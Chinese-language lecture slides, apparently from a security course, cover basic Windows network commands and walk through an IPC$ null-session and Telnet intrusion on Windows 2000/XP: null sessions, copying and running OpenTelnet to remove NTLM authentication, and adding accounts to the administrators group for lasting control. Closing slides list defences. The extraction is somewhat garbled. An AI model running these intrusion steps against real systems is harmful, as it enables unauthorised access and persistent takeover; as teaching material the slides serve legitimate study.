1、o 第3讲 基本的渗透测试命令渗透测试工作过程分析u当我们着手开始对企业的信息系统进行渗透测试时,首先要学会一些常见网络安全的指令的用法。u在渗透过程中我们一般都先用基本的网络安全命令测试目标系统是否允许空连接,是否允许通过Telnet进行远程接入。本讲任务u学会常见的渗透测试指令的用法,会用常见的测试指令去判断目标系统的配置状态。u利用目标系统的ipc$共享建立空连接。u测试目标系统telnet远程访问服务的安全性。u学会防范ipc$空连接入侵和telnet入侵的技术方法基本的渗透测试指令 (要求学生同步练习)1.1 ping指令uping指令通过发送ICMP包来验证与另一台TCP/IP计算
2、机的IP级连接。u应答消息的接收情况将和往返过程的次数一起显示出来。uping指令用于检测网络的连接性和可到达性,如果不带参数,ping将显示帮助。u可以利用ping指令验证和对方计算机的连通性,使用的语法是“ping 对方计算机名或者IP地址”。如果连通的话,返回的信息如图。1.2 ipconfig指令 uipconfig指令显示所有TCP/IP网络配置信息、刷新动态主机配置协议(DHCP,Dynamic Host Configuration Protocol)和域名系统(DNS)设置。u使用不带参数的ipconfig可以显示所有适配器的IP地址、子网掩码和默认网关。在DOS命令行下输入ip
3、config指令。1.3 netstat指令 unetstat指令显示活动的连接、计算机监听的端口、以太网统计信息、IP 路由表、IPv4统计信息(IP、ICMP、TCP和UDP协议)。u使用“netstat-an”命令可以查看目前活动的连接和开放的端口,是网络管理员查看网络是否被入侵的最简单方法。1.4 net指令unet指令的功能非常的强大,net指令在网络安全领域通常用来查看计算机上的用户列表、添加和删除用户、和对方计算机建立连接、启动或者停止某网络服务等。u利用“net user”查看计算机上的用户列表。u利用“net user 用户名 密码”给某用户修改密码,比如把管理员的密码修改成
4、“12345”。和对方计算机建立信任连接u只要拥有某主机的用户名和密码,就可以用“IPC$(Internet Protocol Control)”建立信任连接,建立完信任连接后,可以在命令行下完全控制对方计算机。u比如得到IP为192.168.16.2计算机的管理员密码为123,可以利用指令“net use 192.168.16.2ipc$123/user:administrator”。启动/关闭某项服务net start 服务名/y net stop 服务名/y 映射远程共享 vnet use z:IPbaby 将共享名为baby的共享资源映射到z盘 删除共享映射 vnet use z:/d
5、el 删除映射的z盘 1.5 用copy指令向远程主机复制文件 vcopy opentelnet.exe 192.168.16.2temp 即将当前目录下的opentelnet.exe文件复制到对方temp共享目录内。1.6开启远程主机的telnet并去除NTLM认证 v这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且目标系统需要满足四个要求:v1)目标开启了ipc$共享 2)你要拥有目标机的管理员密码和帐号 3)目标开启RemoteRegistry服务,并用NTLM认证 4)对WIN2K/XP有效。命令格式:OpenTelnet.exe server account
6、 password NTLM认证方式 端口号v示例如下:c:OpenTelnet.exe 192.168.16.2 administrator“”0 90 用telnet和目标机建立连接v如用指令telnet 192.168.16.2 90 就可和目标机192.168.16.2 建立连接,90是刚才指定给telnet服务的端口,按提示输入用户名和口令,进入目标机的命令行界面。渗透测试案例分析利用ipc$和telnet实现入侵渗透vIPC$(Internet Process Connection)是共享命名管道的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可
7、以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。2.1 什么是IPC$v空连接是在没有信任的情况下与服务器建立的会话,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,借此对目标系统实行攻击,以下是空连接中能够使用的具体命令。用工具软件shed测试测试目标系统是否开放ipc$连接共享。2.2 入侵过程分析v使用net use ipipc$“”/user:“”建立一个空连接。v建立了空连接后,用命令net view IP可以查看远程主机的共享资源。v用net time IP查看远程主机的当前时间 v用opentelnet开启目标机的telnet服务,并去除NT
8、LM验证。v用telnet 和目标机建立连接用net user 指令在目标机建立新用户或激活guest帐户v为新用户或guest帐户修改密码v把两个用户加到管理员组中,指令如下:net localgroup administrators guest/addnet localgroup administrators jack/add至此,入侵过程完成,我们就可以用上面个账号对目标系统进行长期控制了。防范ipc$和telnet入侵的技术方法o方法1:运行regedit,找到如下主键HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA把RestrictAnonymous=DWORD的键值改为:1,如果设置为1,一个匿名用户仍然可以连接到IPC$共享,但限制通过这种连接列举得到SAM帐号和共享等信息 o方法2:屏蔽139,445端口,由于没有以上两个端口的支持,是无法建立ipc$连接的,因此屏蔽139,445端口同样可以阻止ipc$入侵。o方法3:设置复杂密码,防止通过ipc$穷举出密码 禁用Telnet服务 小结1.常见网络安全指令的用法常见网络安全指令的用法2.利用利用ipc$和和telnet渗透测试的方法渗透测试的方法3.防范防范ipc$和和telnet入侵的技术方法入侵的技术方法Any question?
